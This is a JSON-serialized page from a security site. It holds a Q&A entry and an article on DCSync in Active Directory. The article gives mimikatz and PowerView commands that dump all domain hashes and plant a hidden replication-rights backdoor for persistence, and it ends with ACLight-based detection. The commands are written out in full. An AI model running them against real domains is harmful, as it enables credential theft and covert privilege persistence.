[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fA57p5xzL3V8X2PU6gmNy17EogTPcmM0LkChgKpRHb1A":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":57,"createdAt":57,"_status":56},1278,"How can an attacker maintain persistence using DCSync without being a Domain Admin?","An attacker can grant DCSync rights to a regular domain user by adding specific Access Control Entries (ACEs) to the domain object using tools like PowerView. The required ACEs are DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes (with a specific GUID). This 'Shadow Admin' can then export all domain hashes without being a member of high-privilege groups.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\n- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\n- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)","\u003Cp>An attacker can grant DCSync rights to a regular domain user by adding specific Access Control Entries (ACEs) to the domain object using tools like PowerView. The required ACEs are DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes (with a specific GUID). This &#39;Shadow Admin&#39; can then export all domain hashes without being a member of high-privilege groups.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [An interesting way of bypassing Windows Attachment Manager](\u002Fnews\u002Fan-interesting-way-of-bypassing-windows-attachment-manager)\u003Cbr>- [Penetration Techniques - Exploitation of Nine Windows Privileges](\u002Fnews\u002Fpenetration-techniques-exploitation-of-nine-windows-privileges)\u003Cbr>- [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-maintain-persistence-using-dcsync-without-being-a-domain-adm-1777477549651","DCSync persistence, Shadow Admin, ACEs, PowerView, Active Directory ACL",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":20,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":53,"updatedAt":54,"createdAt":55,"_status":56},299,"Domain Penetration - DCSync","domain-penetration-dcsync","Learn DCSync techniques for domain penetration: export user hashes, maintain persistence, and detect backdoors with open-source tools and methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a frequently used technique in domain penetration. This article will compile open-source materials, combine personal experience, and summarize methods for exploitation, defense, and detection.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to export all domain user hashes using DCSync\u003C\u002Fli>\u003Cli>Method to maintain persistence within the domain using DCSync\u003C\u002Fli>\u003Cli>Automated detection methods for DCSync backdoors\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to export all domain user hashes using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY gentilkiwi and Vincent LE TOUX, capable of exporting hashes of all users within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Prerequisites:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users in the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer account of the domain controller\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Utilize the DRS (Directory Replication Service) protocol to replicate user credentials from the domain controller via IDL_DRSGetNCChanges\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-drsr\u002Ff977faaa-673e-4f66-b9bf-48c640241d47\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch4>1. Use mimikatz\u003C\u002Fh4>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. PowerShell Implementation\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fmonoxgas\u002F9d238accd969550136db\u003C\u002Fp>\u003Cp>Calling the dcsync function in mimikatz.dll via Invoke-ReflectivePEinjection\u003C\u002Fp>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest -Users @(\"administrator\") | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After obtaining the hashes of domain users, further exploitation can refer to previous articles:\u003C\u002Fp>\u003Cp>\"Domain Penetration - Implementation of Pass The Hash\"\u003C\u002Fp>\u003Cp>\"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)\"\u003C\u002Fp>\u003Cp>\"Domain Penetration - Pass The Hash &amp; Pass The Key\"\u003C\u002Fp>\u003Ch2>0x03 Methods for Maintaining Domain Privileges Using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain the permissions of any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Domain Admins group\u003C\u002Fli>\u003Cli>Users within the Enterprise Admins group\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following three ACEs (Access Control Entries) to a regular user in the domain:\u003C\u002Fp>\u003Cul>\u003Cli>DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>This user will then gain the permission to export all user hashes in the domain using DCSync\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to add ACEs is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to remove ACE:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more information on ACLs, refer to the previous article: 'Penetration Techniques – Access Control List in Windows'\u003C\u002Fp>\u003Cp>The method to invoke DCSync using domain user test1 is as follows:\u003C\u002Fp>\u003Ch4>1. On a domain-joined host logged in as user test1, directly use the DCSync feature of mimikatz\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Use runas to log in as user test1, then perform DCSync\u003C\u002Fh4>\u003Cp>(1) Pop up a cmd window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 cmd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the popped-up cmd window:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute without popping up a window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 c:\\test\\1.bat\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar tools include lsrunas, lsrunase, and CPAU\u003C\u002Fp>\u003Ch4>3. Using PowerShell to log in as user test1, then performing DCSync\u003C\u002Fh4>\u003Cp>(1) Launch cmd\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)\u003Cbr>Start-Process -FilePath \"cmd.exe\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the launched cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Implement without pop-up window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)        \u003Cbr>Start-Process -FilePath \"c:\\test\\1.bat\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using wmic to log in as user test1 on the local machine will fail with the following error:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ERROR:\u003Cbr>Description = User credentials cannot be used for local connections\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Automated Detection Method for DCSync Backdoors\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Users with high privileges but not in high-privilege groups are referred to as Shadow Admins, such as the domain user test1 in 0x03. Simply querying members of high-privilege groups cannot reveal Shadow Admins within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Detection Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Enumerate the ACLs of all users in Active Directory and flag privileged accounts.\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcyberark\u002FACLight\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Powershell v3.0\u003C\u002Fli>\u003Cli>Domain User Privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Detection Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute Execute-ACLight2.bat from the project\u003C\u002Fp>\u003Cp>Three files will be generated:\u003C\u002Fp>\u003Cul>\u003Cli>Privileged Accounts - Layers Analysis.txt\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Final Report.csv\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Irregular Accounts.csv\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The files will display all privileged accounts\u003C\u002Fp>\u003Cp>Testing shows that ACLight can detect user test1 with DCSync permissions added\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation of DCSync in domain penetration and automated detection methods. From a defensive perspective, it is recommended to use ACLight to detect user ACLs in the domain environment\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,"published","2026-02-02T07:25:19.682Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"DCSync Domain Penetration: Export Hashes & Persistence","DCSync, domain penetration, hash export, persistence, detection, mimikatz, PowerShell",false,[],{"docs":41,"hasNextPage":52},[42,43,44,45,46,47,48,49,50,51],1289,1288,1287,1286,1285,1284,1283,1282,1281,1280,true,{"title":30,"description":30,"image":30},"2026-07-24T02:07:12.184Z","2026-07-23T16:02:42.706Z","draft","2026-07-23T16:17:50.869Z"]